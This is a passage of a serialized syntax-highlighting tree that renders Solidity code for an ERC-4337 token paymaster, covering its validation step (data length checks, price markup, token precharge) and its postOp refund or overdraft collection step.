",{"type":25,"tag":216,"props":107114,"children":107115},{"style":6953},[107116],{"type":31,"value":266},{"type":25,"tag":216,"props":107118,"children":107119},{"style":6964},[107120],{"type":31,"value":107121}," tokenPaymasterConfig.baseFee;\n",{"type":25,"tag":216,"props":107123,"children":107124},{"class":6922,"line":7305},[107125,107129,107134,107138,107143,107147],{"type":25,"tag":216,"props":107126,"children":107127},{"style":7375},[107128],{"type":31,"value":107086},{"type":25,"tag":216,"props":107130,"children":107131},{"style":6964},[107132],{"type":31,"value":107133}," dataLength ",{"type":25,"tag":216,"props":107135,"children":107136},{"style":6953},[107137],{"type":31,"value":266},{"type":25,"tag":216,"props":107139,"children":107140},{"style":6964},[107141],{"type":31,"value":107142}," userOp.paymasterAndData.length ",{"type":25,"tag":216,"props":107144,"children":107145},{"style":6953},[107146],{"type":31,"value":8276},{"type":25,"tag":216,"props":107148,"children":107149},{"style":6964},[107150],{"type":31,"value":107151}," PAYMASTER_DATA_OFFSET;\n",{"type":25,"tag":216,"props":107153,"children":107154},{"class":6922,"line":7557},[107155,107160,107165,107169,107173,107177,107181,107185,107190,107194,107199],{"type":25,"tag":216,"props":107156,"children":107157},{"style":6973},[107158],{"type":31,"value":107159},"            require",{"type":25,"tag":216,"props":107161,"children":107162},{"style":6964},[107163],{"type":31,"value":107164},"(dataLength ",{"type":25,"tag":216,"props":107166,"children":107167},{"style":6953},[107168],{"type":31,"value":12528},{"type":25,"tag":216,"props":107170,"children":107171},{"style":6989},[107172],{"type":31,"value":6992},{"type":25,"tag":216,"props":107174,"children":107175},{"style":6953},[107176],{"type":31,"value":27654},{"type":25,"tag":216,"props":107178,"children":107179},{"style":6964},[107180],{"type":31,"value":107133},{"type":25,"tag":216,"props":107182,"children":107183},{"style":6953},[107184],{"type":31,"value":12528},{"type":25,"tag":216,"props":107186,"children":107187},{"style":6989},[107188],{"type":31,"value":107189}," 32",{"type":25,"tag":216,"props":107191,"children":107192},{"style":6964},[107193],{"type":31,"value":7026},{"type":25,"tag":216,"props":107195,"children":107196},{"style":8205},[107197],{"type":31,"value":107198},"\"TPM: invalid data length\"",{"type":25,"tag":216,"props":107200,"children":107201},{"style":6964},[107202],{"type":31,"value":7797},{"type":25,"tag":216,"props":107204,"children":107205},{"class":6922,"line":7574},[107206,107210,107215,107219,107224,107229],{"type":25,"tag":216,"props":107207,"children":107208},{"style":7375},[107209],{"type":31,"value":107086},{"type":25,"tag":216,"props":107211,"children":107212},{"style":6964},[107213],{"type":31,"value":107214}," maxFeePerGas ",{"type":25,"tag":216,"props":107216,"children":107217},{"style":6953},[107218],{"type":31,"value":266},{"type":25,"tag":216,"props":107220,"children":107221},{"style":6964},[107222],{"type":31,"value":107223}," userOp.",{"type":25,"tag":216,"props":107225,"children":107226},{"style":7047},[107227],{"type":31,"value":107228},"unpackMaxFeePerGas",{"type":25,"tag":216,"props":107230,"children":107231},{"style":6964},[107232],{"type":31,"value":7633},{"type":25,"tag":216,"props":107234,"children":107235},{"class":6922,"line":7591},[107236,107240,107245,107249],{"type":25,"tag":216,"props":107237,"children":107238},{"style":7375},[107239],{"type":31,"value":107086},{"type":25,"tag":216,"props":107241,"children":107242},{"style":6964},[107243],{"type":31,"value":107244}," refundPostopCost ",{"type":25,"tag":216,"props":107246,"children":107247},{"style":6953},[107248],{"type":31,"value":266},{"type":25,"tag":216,"props":107250,"children":107251},{"style":6964},[107252],{"type":31,"value":107253}," tokenPaymasterConfig.refundPostopCost;\n",{"type":25,"tag":216,"props":107255,"children":107256},{"class":6922,"line":7604},[107257,107261,107266,107270,107274,107279,107283,107288],{"type":25,"tag":216,"props":107258,"children":107259},{"style":6973},[107260],{"type":31,"value":107159},{"type":25,"tag":216,"props":107262,"children":107263},{"style":6964},[107264],{"type":31,"value":107265},"(refundPostopCost ",{"type":25,"tag":216,"props":107267,"children":107268},{"style":6953},[107269],{"type":31,"value":9757},{"type":25,"tag":216,"props":107271,"children":107272},{"style":6964},[107273],{"type":31,"value":107223},{"type":25,"tag":216,"props":107275,"children":107276},{"style":7047},[107277],{"type":31,"value":107278},"unpackPostOpGasLimit",{"type":25,"tag":216,"props":107280,"children":107281},{"style":6964},[107282],{"type":31,"value":22334},{"type":25,"tag":216,"props":107284,"children":107285},{"style":8205},[107286],{"type":31,"value":107287},"\"TPM: postOpGasLimit too low\"",{"type":25,"tag":216,"props":107289,"children":107290},{"style":6964},[107291],{"type":31,"value":7797},{"type":25,"tag":216,"props":107293,"children":107294},{"class":6922,"line":7613},[107295,107299,107304,107308,107313,107317,107322,107326],{"type":25,"tag":216,"props":107296,"children":107297},{"style":7375},[107298],{"type":31,"value":107086},{"type":25,"tag":216,"props":107300,"children":107301},{"style":6964},[107302],{"type":31,"value":107303}," preChargeNative ",{"type":25,"tag":216,"props":107305,"children":107306},{"style":6953},[107307],{"type":31,"value":266},{"type":25,"tag":216,"props":107309,"children":107310},{"style":6964},[107311],{"type":31,"value":107312}," requiredPreFund ",{"type":25,"tag":216,"props":107314,"children":107315},{"style":6953},[107316],{"type":31,"value":3539},{"type":25,"tag":216,"props":107318,"children":107319},{"style":6964},[107320],{"type":31,"value":107321}," (refundPostopCost ",{"type":25,"tag":216,"props":107323,"children":107324},{"style":6953},[107325],{"type":31,"value":8519},{"type":25,"tag":216,"props":107327,"children":107328},{"style":6964},[107329],{"type":31,"value":107330}," maxFeePerGas);\n",{"type":25,"tag":216,"props":107332,"children":107333},{"class":6922,"line":7636},[107334,107339,107343],{"type":25,"tag":216,"props":107335,"children":107336},{"style":6927},[107337],{"type":31,"value":107338},"            // ",{"type":25,"tag":216,"props":107340,"children":107341},{"style":6936},[107342],{"type":31,"value":70728},{"type":25,"tag":216,"props":107344,"children":107345},{"style":6927},[107346],{"type":31,"value":107347},": price is in native-asset-per-token increasing it means dividing it by markup\n",{"type":25,"tag":216,"props":107349,"children":107350},{"class":6922,"line":7645},[107351,107355,107360,107364,107369,107373,107378,107382],{"type":25,"tag":216,"props":107352,"children":107353},{"style":7375},[107354],{"type":31,"value":107086},{"type":25,"tag":216,"props":107356,"children":107357},{"style":6964},[107358],{"type":31,"value":107359}," cachedPriceWithMarkup ",{"type":25,"tag":216,"props":107361,"children":107362},{"style":6953},[107363],{"type":31,"value":266},{"type":25,"tag":216,"props":107365,"children":107366},{"style":6964},[107367],{"type":31,"value":107368}," cachedPrice ",{"type":25,"tag":216,"props":107370,"children":107371},{"style":6953},[107372],{"type":31,"value":8519},{"type":25,"tag":216,"props":107374,"children":107375},{"style":6964},[107376],{"type":31,"value":107377}," DENOM ",{"type":25,"tag":216,"props":107379,"children":107380},{"style":6953},[107381],{"type":31,"value":5755},{"type":25,"tag":216,"props":107383,"children":107384},{"style":6964},[107385],{"type":31,"value":107386}," priceMarkup;\n",{"type":25,"tag":216,"props":107388,"children":107389},{"class":6922,"line":7654},[107390,107394,107399,107403,107407],{"type":25,"tag":216,"props":107391,"children":107392},{"style":6973},[107393],{"type":31,"value":62768},{"type":25,"tag":216,"props":107395,"children":107396},{"style":6964},[107397],{"type":31,"value":107398}," (dataLength ",{"type":25,"tag":216,"props":107400,"children":107401},{"style":6953},[107402],{"type":31,"value":12528},{"type":25,"tag":216,"props":107404,"children":107405},{"style":6989},[107406],{"type":31,"value":107189},{"type":25,"tag":216,"props":107408,"children":107409},{"style":6964},[107410],{"type":31,"value":18761},{"type":25,"tag":216,"props":107412,"children":107413},{"class":6922,"line":7722},[107414,107419,107424],{"type":25,"tag":216,"props":107415,"children":107416},{"style":7375},[107417],{"type":31,"value":107418},"                uint256",{"type":25,"tag":216,"props":107420,"children":107421},{"style":6964},[107422],{"type":31,"value":107423}," clientSuppliedPrice ",{"type":25,"tag":216,"props":107425,"children":107426},{"style":6953},[107427],{"type":31,"value":18650},{"type":25,"tag":216,"props":107429,"children":107430},{"class":6922,"line":7730},[107431,107436,107440,107444,107449,107453,107458,107462,107466],{"type":25,"tag":216,"props":107432,"children":107433},{"style":7375},[107434],{"type":31,"value":107435},"                    uint256",{"type":25,"tag":216,"props":107437,"children":107438},{"style":6964},[107439],{"type":31,"value":1850},{"type":25,"tag":216,"props":107441,"children":107442},{"style":7375},[107443],{"type":31,"value":106984},{"type":25,"tag":216,"props":107445,"children":107446},{"style":6964},[107447],{"type":31,"value":107448},"(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET",{"type":25,"tag":216,"props":107450,"children":107451},{"style":6953},[107452],{"type":31,"value":1472},{"type":25,"tag":216,"props":107454,"children":107455},{"style":6964},[107456],{"type":31,"value":107457},"PAYMASTER_DATA_OFFSET ",{"type":25,"tag":216,"props":107459,"children":107460},{"style":6953},[107461],{"type":31,"value":3539},{"type":25,"tag":216,"props":107463,"children":107464},{"style":6989},[107465],{"type":31,"value":107189},{"type":25,"tag":216,"props":107467,"children":107468},{"style":6964},[107469],{"type":31,"value":107470},"]));\n",{"type":25,"tag":216,"props":107472,"children":107473},{"class":6922,"line":7760},[107474,107479,107484,107488],{"type":25,"tag":216,"props":107475,"children":107476},{"style":6973},[107477],{"type":31,"value":107478},"                if",{"type":25,"tag":216,"props":107480,"children":107481},{"style":6964},[107482],{"type":31,"value":107483}," (clientSuppliedPrice ",{"type":25,"tag":216,"props":107485,"children":107486},{"style":6953},[107487],{"type":31,"value":9757},{"type":25,"tag":216,"props":107489,"children":107490},{"style":6964},[107491],{"type":31,"value":107492}," cachedPriceWithMarkup) {\n",{"type":25,"tag":216,"props":107494,"children":107495},{"class":6922,"line":7768},[107496,107501,107505],{"type":25,"tag":216,"props":107497,"children":107498},{"style":6927},[107499],{"type":31,"value":107500},"                    // ",{"type":25,"tag":216,"props":107502,"children":107503},{"style":6936},[107504],{"type":31,"value":70728},{"type":25,"tag":216,"props":107506,"children":107507},{"style":6927},[107508],{"type":31,"value":107509},": smaller number means 'more native asset per token'\n",{"type":25,"tag":216,"props":107511,"children":107512},{"class":6922,"line":7800},[107513,107518,107522],{"type":25,"tag":216,"props":107514,"children":107515},{"style":6964},[107516],{"type":31,"value":107517},"                    cachedPriceWithMarkup ",{"type":25,"tag":216,"props":107519,"children":107520},{"style":6953},[107521],{"type":31,"value":266},{"type":25,"tag":216,"props":107523,"children":107524},{"style":6964},[107525],{"type":31,"value":107526}," clientSuppliedPrice;\n",{"type":25,"tag":216,"props":107528,"children":107529},{"class":6922,"line":7808},[107530],{"type":25,"tag":216,"props":107531,"children":107532},{"style":6964},[107533],{"type":31,"value":75041},{"type":25,"tag":216,"props":107535,"children":107536},{"class":6922,"line":7868},[107537],{"type":25,"tag":216,"props":107538,"children":107539},{"style":6964},[107540],{"type":31,"value":62852},{"type":25,"tag":216,"props":107542,"children":107543},{"class":6922,"line":13001},[107544,107548,107553,107557,107562],{"type":25,"tag":216,"props":107545,"children":107546},{"style":7375},[107547],{"type":31,"value":107086},{"type":25,"tag":216,"props":107549,"children":107550},{"style":6964},[107551],{"type":31,"value":107552}," tokenAmount ",{"type":25,"tag":216,"props":107554,"children":107555},{"style":6953},[107556],{"type":31,"value":266},{"type":25,"tag":216,"props":107558,"children":107559},{"style":7047},[107560],{"type":31,"value":107561}," weiToToken",{"type":25,"tag":216,"props":107563,"children":107564},{"style":6964},[107565],{"type":31,"value":107566},"(preChargeNative, cachedPriceWithMarkup);\n",{"type":25,"tag":216,"props":107568,"children":107569},{"class":6922,"line":13019},[107570,107575,107579],{"type":25,"tag":216,"props":107571,"children":107572},{"style":6964},[107573],{"type":31,"value":107574},"            tokenAmount ",{"type":25,"tag":216,"props":107576,"children":107577},{"style":6953},[107578],{"type":31,"value":72407},{"type":25,"tag":216,"props":107580,"children":107581},{"style":6964},[107582],{"type":31,"value":107583}," baseFee;\n",{"type":25,"tag":216,"props":107585,"children":107586},{"class":6922,"line":13064},[107587,107592,107597,107602,107606,107610,107614],{"type":25,"tag":216,"props":107588,"children":107589},{"style":6964},[107590],{"type":31,"value":107591},"            SafeERC20.",{"type":25,"tag":216,"props":107593,"children":107594},{"style":7047},[107595],{"type":31,"value":107596},"safeTransferFrom",{"type":25,"tag":216,"props":107598,"children":107599},{"style":6964},[107600],{"type":31,"value":107601},"(token, userOp.sender, ",{"type":25,"tag":216,"props":107603,"children":107604},{"style":7375},[107605],{"type":31,"value":36603},{"type":25,"tag":216,"props":107607,"children":107608},{"style":6964},[107609],{"type":31,"value":1850},{"type":25,"tag":216,"props":107611,"children":107612},{"style":6936},[107613],{"type":31,"value":21651},{"type":25,"tag":216,"props":107615,"children":107616},{"style":6964},[107617],{"type":31,"value":107618},"), tokenAmount);\n",{"type":25,"tag":216,"props":107620,"children":107621},{"class":6922,"line":13170},[107622,107627,107631,107636,107640,107645],{"type":25,"tag":216,"props":107623,"children":107624},{"style":6964},[107625],{"type":31,"value":107626},"            context ",{"type":25,"tag":216,"props":107628,"children":107629},{"style":6953},[107630],{"type":31,"value":266},{"type":25,"tag":216,"props":107632,"children":107633},{"style":6936},[107634],{"type":31,"value":107635}," abi",{"type":25,"tag":216,"props":107637,"children":107638},{"style":6964},[107639],{"type":31,"value":179},{"type":25,"tag":216,"props":107641,"children":107642},{"style":7047},[107643],{"type":31,"value":107644},"encode",{"type":25,"tag":216,"props":107646,"children":107647},{"style":6964},[107648],{"type":31,"value":107649},"(tokenAmount, userOp.sender);\n",{"type":25,"tag":216,"props":107651,"children":107652},{"class":6922,"line":27455},[107653,107658],{"type":25,"tag":216,"props":107654,"children":107655},{"style":6964},[107656],{"type":31,"value":107657},"            validationResult ",{"type":25,"tag":216,"props":107659,"children":107660},{"style":6953},[107661],{"type":31,"value":18650},{"type":25,"tag":216,"props":107663,"children":107664},{"class":6922,"line":27490},[107665,107670,107674,107678,107682,107687,107692,107696,107701,107705],{"type":25,"tag":216,"props":107666,"children":107667},{"style":7047},[107668],{"type":31,"value":107669},"                _packValidationData",{"type":25,"tag":216,"props":107671,"children":107672},{"style":6964},[107673],{"type":31,"value":1850},{"type":25,"tag":216,"props":107675,"children":107676},{"style":6936},[107677],{"type":31,"value":12127},{"type":25,"tag":216,"props":107679,"children":107680},{"style":6964},[107681],{"type":31,"value":7026},{"type":25,"tag":216,"props":107683,"children":107684},{"style":7375},[107685],{"type":31,"value":107686},"uint48",{"type":25,"tag":216,"props":107688,"children":107689},{"style":6964},[107690],{"type":31,"value":107691},"(cachedPriceTimestamp ",{"type":25,"tag":216,"props":107693,"children":107694},{"style":6953},[107695],{"type":31,"value":3539},{"type":25,"tag":216,"props":107697,"children":107698},{"style":6964},[107699],{"type":31,"value":107700}," tokenPaymasterConfig.priceMaxAge), ",{"type":25,"tag":216,"props":107702,"children":107703},{"style":6989},[107704],{"type":31,"value":1882},{"type":25,"tag":216,"props":107706,"children":107707},{"style":6964},[107708],{"type":31,"value":7797},{"type":25,"tag":216,"props":107710,"children":107711},{"class":6922,"line":27498},[107712],{"type":25,"tag":216,"props":107713,"children":107714},{"style":6964},[107715],{"type":31,"value":7302},{"type":25,"tag":216,"props":107717,"children":107718},{"class":6922,"line":27506},[107719],{"type":25,"tag":216,"props":107720,"children":107721},{"style":6964},[107722],{"type":31,"value":7311},{"type":25,"tag":216,"props":107724,"children":107725},{"class":6922,"line":27515},[107726],{"type":25,"tag":216,"props":107727,"children":107728},{"style":6964},[107729],{"type":31,"value":14275},{"type":25,"tag":216,"props":107731,"children":107732},{"class":6922,"line":27557},[107733,107737,107742,107746,107751,107755,107759,107763,107767,107771,107775,107780,107784,107788,107793],{"type":25,"tag":216,"props":107734,"children":107735},{"style":6936},[107736],{"type":31,"value":93802},{"type":25,"tag":216,"props":107738,"children":107739},{"style":7047},[107740],{"type":31,"value":107741}," _postOp",{"type":25,"tag":216,"props":107743,"children":107744},{"style":6964},[107745],{"type":31,"value":1850},{"type":25,"tag":216,"props":107747,"children":107748},{"style":6936},[107749],{"type":31,"value":107750},"PostOpMode",{"type":25,"tag":216,"props":107752,"children":107753},{"style":6964},[107754],{"type":31,"value":7026},{"type":25,"tag":216,"props":107756,"children":107757},{"style":7375},[107758],{"type":31,"value":87800},{"type":25,"tag":216,"props":107760,"children":107761},{"style":6936},[107762],{"type":31,"value":106970},{"type":25,"tag":216,"props":107764,"children":107765},{"style":6947},[107766],{"type":31,"value":80312},{"type":25,"tag":216,"props":107768,"children":107769},{"style":6964},[107770],{"type":31,"value":7026},{"type":25,"tag":216,"props":107772,"children":107773},{"style":7375},[107774],{"type":31,"value":50136},{"type":25,"tag":216,"props":107776,"children":107777},{"style":6947},[107778],{"type":31,"value":107779}," actualGasCost",{"type":25,"tag":216,"props":107781,"children":107782},{"style":6964},[107783],{"type":31,"value":7026},{"type":25,"tag":216,"props":107785,"children":107786},{"style":7375},[107787],{"type":31,"value":50136},{"type":25,"tag":216,"props":107789,"children":107790},{"style":6947},[107791],{"type":31,"value":107792}," actualUserOpFeePerGas",{"type":25,"tag":216,"props":107794,"children":107795},{"style":6964},[107796],{"type":31,"value":7107},{"type":25,"tag":216,"props":107798,"children":107799},{"class":6922,"line":27590},[107800],{"type":25,"tag":216,"props":107801,"children":107802},{"style":6936},[107803],{"type":31,"value":107009},{"type":25,"tag":216,"props":107805,"children":107806},{"class":6922,"line":27598},[107807],{"type":25,"tag":216,"props":107808,"children":107809},{"style":6936},[107810],{"type":31,"value":107017},{"type":25,"tag":216,"props":107812,"children":107813},{"class":6922,"line":27606},[107814],{"type":25,"tag":216,"props":107815,"children":107816},{"style":6964},[107817],{"type":31,"value":33147},{"type":25,"tag":216,"props":107819,"children":107820},{"class":6922,"line":27615},[107821,107825],{"type":25,"tag":216,"props":107822,"children":107823},{"style":6973},[107824],{"type":31,"value":107074},{"type":25,"tag":216,"props":107826,"children":107827},{"style":6964},[107828],{"type":31,"value":7241},{"type":25,"tag":216,"props":107830,"children":107831},{"class":6922,"line":27691},[107832,107836,107840,107844],{"type":25,"tag":216,"props":107833,"children":107834},{"style":7375},[107835],{"type":31,"value":107086},{"type":25,"tag":216,"props":107837,"children":107838},{"style":6964},[107839],{"type":31,"value":107091},{"type":25,"tag":216,"props":107841,"children":107842},{"style":6953},[107843],{"type":31,"value":266},{"type":25,"tag":216,"props":107845,"children":107846},{"style":6964},[107847],{"type":31,"value":107100},{"type":25,"tag":216,"props":107849,"children":107850},{"class":6922,"line":27724},[107851,107855,107859,107863],{"type":25,"tag":216,"props":107852,"children":107853},{"style":7375},[107854],{"type":31,"value":107086},{"type":25,"tag":216,"props":107856,"children":107857},{"style":6964},[107858],{"type":31,"value":107112},{"type":25,"tag":216,"props":107860,"children":107861},{"style":6953},[107862],{"type":31,"value":266},{"type":25,"tag":216,"props":107864,"children":107865},{"style":6964},[107866],{"type":31,"value":107121},{"type":25,"tag":216,"props":107868,"children":107869},{"class":6922,"line":27732},[107870,107875,107879,107884,107888,107893,107897,107901,107905,107910,107915,107919,107923,107927],{"type":25,"tag":216,"props":107871,"children":107872},{"style":6964},[107873],{"type":31,"value":107874},"            (",{"type":25,"tag":216,"props":107876,"children":107877},{"style":7375},[107878],{"type":31,"value":50136},{"type":25,"tag":216,"props":107880,"children":107881},{"style":6964},[107882],{"type":31,"value":107883}," preCharge, ",{"type":25,"tag":216,"props":107885,"children":107886},{"style":7375},[107887],{"type":31,"value":36603},{"type":25,"tag":216,"props":107889,"children":107890},{"style":6964},[107891],{"type":31,"value":107892}," userOpSender) ",{"type":25,"tag":216,"props":107894,"children":107895},{"style":6953},[107896],{"type":31,"value":266},{"type":25,"tag":216,"props":107898,"children":107899},{"style":6936},[107900],{"type":31,"value":107635},{"type":25,"tag":216,"props":107902,"children":107903},{"style":6964},[107904],{"type":31,"value":179},{"type":25,"tag":216,"props":107906,"children":107907},{"style":7047},[107908],{"type":31,"value":107909},"decode",{"type":25,"tag":216,"props":107911,"children":107912},{"style":6964},[107913],{"type":31,"value":107914},"(context, (",{"type":25,"tag":216,"props":107916,"children":107917},{"style":7375},[107918],{"type":31,"value":50136},{"type":25,"tag":216,"props":107920,"children":107921},{"style":6964},[107922],{"type":31,"value":7026},{"type":25,"tag":216,"props":107924,"children":107925},{"style":7375},[107926],{"type":31,"value":36603},{"type":25,"tag":216,"props":107928,"children":107929},{"style":6964},[107930],{"type":31,"value":11175},{"type":25,"tag":216,"props":107932,"children":107933},{"class":6922,"line":27740},[107934,107939,107944,107949],{"type":25,"tag":216,"props":107935,"children":107936},{"style":6964},[107937],{"type":31,"value":107938},"            preCharge ",{"type":25,"tag":216,"props":107940,"children":107941},{"style":6953},[107942],{"type":31,"value":107943},"-=",{"type":25,"tag":216,"props":107945,"children":107946},{"style":6964},[107947],{"type":31,"value":107948}," baseFee; ",{"type":25,"tag":216,"props":107950,"children":107951},{"style":6927},[107952],{"type":31,"value":107953},"// don't refund the base fee\n",{"type":25,"tag":216,"props":107955,"children":107956},{"class":6922,"line":27777},[107957,107961,107966,107970,107975,107979,107983],{"type":25,"tag":216,"props":107958,"children":107959},{"style":7375},[107960],{"type":31,"value":107086},{"type":25,"tag":216,"props":107962,"children":107963},{"style":6964},[107964],{"type":31,"value":107965}," _cachedPrice ",{"type":25,"tag":216,"props":107967,"children":107968},{"style":6953},[107969],{"type":31,"value":266},{"type":25,"tag":216,"props":107971,"children":107972},{"style":7047},[107973],{"type":31,"value":107974}," updateCachedPrice",{"type":25,"tag":216,"props":107976,"children":107977},{"style":6964},[107978],{"type":31,"value":1850},{"type":25,"tag":216,"props":107980,"children":107981},{"style":6936},[107982],{"type":31,"value":12127},{"type":25,"tag":216,"props":107984,"children":107985},{"style":6964},[107986],{"type":31,"value":7797},{"type":25,"tag":216,"props":107988,"children":107989},{"class":6922,"line":27790},[107990,107994,107998],{"type":25,"tag":216,"props":107991,"children":107992},{"style":6927},[107993],{"type":31,"value":107338},{"type":25,"tag":216,"props":107995,"children":107996},{"style":6936},[107997],{"type":31,"value":70728},{"type":25,"tag":216,"props":107999,"children":108000},{"style":6927},[108001],{"type":31,"value":107347},{"type":25,"tag":216,"props":108003,"children":108004},{"class":6922,"line":27803},[108005,108009,108013,108017,108021,108025,108029,108033],{"type":25,"tag":216,"props":108006,"children":108007},{"style":7375},[108008],{"type":31,"value":107086},{"type":25,"tag":216,"props":108010,"children":108011},{"style":6964},[108012],{"type":31,"value":107359},{"type":25,"tag":216,"props":108014,"children":108015},{"style":6953},[108016],{"type":31,"value":266},{"type":25,"tag":216,"props":108018,"children":108019},{"style":6964},[108020],{"type":31,"value":107965},{"type":25,"tag":216,"props":108022,"children":108023},{"style":6953},[108024],{"type":31,"value":8519},{"type":25,"tag":216,"props":108026,"children":108027},{"style":6964},[108028],{"type":31,"value":107377},{"type":25,"tag":216,"props":108030,"children":108031},{"style":6953},[108032],{"type":31,"value":5755},{"type":25,"tag":216,"props":108034,"children":108035},{"style":6964},[108036],{"type":31,"value":107386},{"type":25,"tag":216,"props":108038,"children":108039},{"class":6922,"line":27816},[108040],{"type":25,"tag":216,"props":108041,"children":108042},{"style":6927},[108043],{"type":31,"value":108044},"            // Refund tokens based on actual gas cost\n",{"type":25,"tag":216,"props":108046,"children":108047},{"class":6922,"line":27870},[108048,108052,108057,108061,108066,108070,108075,108079],{"type":25,"tag":216,"props":108049,"children":108050},{"style":7375},[108051],{"type":31,"value":107086},{"type":25,"tag":216,"props":108053,"children":108054},{"style":6964},[108055],{"type":31,"value":108056}," actualChargeNative ",{"type":25,"tag":216,"props":108058,"children":108059},{"style":6953},[108060],{"type":31,"value":266},{"type":25,"tag":216,"props":108062,"children":108063},{"style":6964},[108064],{"type":31,"value":108065}," actualGasCost ",{"type":25,"tag":216,"props":108067,"children":108068},{"style":6953},[108069],{"type":31,"value":3539},{"type":25,"tag":216,"props":108071,"children":108072},{"style":6964},[108073],{"type":31,"value":108074}," tokenPaymasterConfig.refundPostopCost ",{"type":25,"tag":216,"props":108076,"children":108077},{"style":6953},[108078],{"type":31,"value":8519},{"type":25,"tag":216,"props":108080,"children":108081},{"style":6964},[108082],{"type":31,"value":108083}," actualUserOpFeePerGas;\n",{"type":25,"tag":216,"props":108085,"children":108086},{"class":6922,"line":27879},[108087,108091,108096,108100,108104],{"type":25,"tag":216,"props":108088,"children":108089},{"style":7375},[108090],{"type":31,"value":107086},{"type":25,"tag":216,"props":108092,"children":108093},{"style":6964},[108094],{"type":31,"value":108095}," actualTokenNeeded ",{"type":25,"tag":216,"props":108097,"children":108098},{"style":6953},[108099],{"type":31,"value":266},{"type":25,"tag":216,"props":108101,"children":108102},{"style":7047},[108103],{"type":31,"value":107561},{"type":25,"tag":216,"props":108105,"children":108106},{"style":6964},[108107],{"type":31,"value":108108},"(actualChargeNative, cachedPriceWithMarkup);\n",{"type":25,"tag":216,"props":108110,"children":108111},{"class":6922,"line":36243},[108112,108116,108121,108125],{"type":25,"tag":216,"props":108113,"children":108114},{"style":6973},[108115],{"type":31,"value":62768},{"type":25,"tag":216,"props":108117,"children":108118},{"style":6964},[108119],{"type":31,"value":108120}," (preCharge ",{"type":25,"tag":216,"props":108122,"children":108123},{"style":6953},[108124],{"type":31,"value":5902},{"type":25,"tag":216,"props":108126,"children":108127},{"style":6964},[108128],{"type":31,"value":108129}," actualTokenNeeded) {\n",{"type":25,"tag":216,"props":108131,"children":108132},{"class":6922,"line":36264},[108133],{"type":25,"tag":216,"props":108134,"children":108135},{"style":6927},[108136],{"type":31,"value":108137},"                // If initially provided token amount is greater than the actual amount needed, refund the difference\n",{"type":25,"tag":216,"props":108139,"children":108140},{"class":6922,"line":84923},[108141,108146,108151,108156,108160],{"type":25,"tag":216,"props":108142,"children":108143},{"style":6964},[108144],{"type":31,"value":108145},"                SafeERC20.",{"type":25,"tag":216,"props":108147,"children":108148},{"style":7047},[108149],{"type":31,"value":108150},"safeTransfer",{"type":25,"tag":216,"props":108152,"children":108153},{"style":6964},[108154],{"type":31,"value":108155},"(token, userOpSender, preCharge ",{"type":25,"tag":216,"props":108157,"children":108158},{"style":6953},[108159],{"type":31,"value":8276},{"type":25,"tag":216,"props":108161,"children":108162},{"style":6964},[108163],{"type":31,"value":108164}," actualTokenNeeded);\n",{"type":25,"tag":216,"props":108166,"children":108167},{"class":6922,"line":84936},[108168,108172,108176,108180,108184,108188],{"type":25,"tag":216,"props":108169,"children":108170},{"style":6964},[108171],{"type":31,"value":74564},{"type":25,"tag":216,"props":108173,"children":108174},{"style":6973},[108175],{"type":31,"value":7268},{"type":25,"tag":216,"props":108177,"children":108178},{"style":6973},[108179],{"type":31,"value":19746},{"type":25,"tag":216,"props":108181,"children":108182},{"style":6964},[108183],{"type":31,"value":108120},{"type":25,"tag":216,"props":108185,"children":108186},{"style":6953},[108187],{"type":31,"value":9757},{"type":25,"tag":216,"props":108189,"children":108190},{"style":6964},[108191],{"type":31,"value":108129},{"type":25,"tag":216,"props":108193,"children":108194},{"class":6922,"line":84944},[108195],{"type":25,"tag":216,"props":108196,"children":108197},{"style":6927},[108198],{"type":31,"value":108199},"                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n",{"type":25,"tag":216,"props":108201,"children":108202},{"class":6922,"line":84952},[108203],{"type":25,"tag":216,"props":108204,"children":108205},{"style":6927},[108206],{"type":31,"value":108207},"                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n",{"type":25,"tag":216,"props":108209,"children":108210},{"class":6922,"line":84960},[108211,108215,108219,108224,108228,108232,108236,108241,108245],{"type":25,"tag":216,"props":108212,"children":108213},{"style":6964},[108214],{"type":31,"value":108145},{"type":25,"tag":216,"props":108216,"children":108217},{"style":7047},[108218],{"type":31,"value":107596},{"type":25,"tag":216,"props":108220,"children":108221},{"style":6964},[108222],{"type":31,"value":108223},"(token, userOpSender, ",{"type":25,"tag":216,"props":108225,"children":108226},{"style":7375},[108227],{"type":31,"value":36603},{"type":25,"tag":216,"props":108229,"children":108230},{"style":6964},[108231],{"type":31,"value":1850},{"type":25,"tag":216,"props":108233,"children":108234},{"style":6936},[108235],{"type":31,"value":21651},{"type":25,"tag":216,"props":108237,"children":108238},{"style":6964},[108239],{"type":31,"value":108240},"), actualTokenNeeded ",{"type":25,"tag":216,"props":108242,"children":108243},{"style":6953},[108244],{"type":31,"value":8276},{"type":25,"tag":216,"props":108246,"children":108247},{"style":6964},[108248],{"type":31,"value":108249}," preCharge);\n",{"type":25,"tag":216,"props":108251,"children":108252},{"class":6922,"line":85000},[108253],{"type":25,"tag":216,"props":108254,"children":108255},{"style":6964},[108256],{"type":31,"value":62852},{"type":25,"tag":216,"props":108258,"children":108259},{"class":6922,"line":85008},[108260],{"type":25,"tag":216,"props":108261,"children":108262},{"emptyLinePlaceholder":16},[108263],{"type":31,"value":7642},{"type":25,"tag":216,"props":108265,"children":108266},{"class":6922,"line":92194},[108267,108271,108276,108280,108284],{"type":25,"tag":216,"props":108268,"children":108269},{"style":6973},[108270],{"type":31,"value":62768},{"type":25,"tag":216,"props":108272,"children":108273},{"style":6964},[108274],{"type":31,"value":108275}," (baseFee ",{"type":25,"tag":216,"props":108277,"children":108278},{"style":6953},[108279],{"type":31,"value":5902},{"type":25,"tag":216,"props":108281,"children":108282},{"style":6989},[108283],{"type":31,"value":6992},{"type":25,"tag":216,"props":108285,"children":108286},{"style":6964},[108287],{"type":31,"value":18761},{"type":25,"tag":216,"props":108289,"children":108290},{"class":6922,"line":92202},[108291,108295,108299],{"type":25,"tag":216,"props":108292,"children":108293},{"style":6964},[108294],{"type":31,"value":108145},{"type":25,"tag":216,"props":108296,"children":108297},{"style":7047},[108298],{"type":31,"value":108150},{"type":25,"tag":216,"props":108300,"children":108301},{"style":6964},[108302],{"type":31,"value":108303},"(token, tokenPaymasterConfig.rewardsPool, 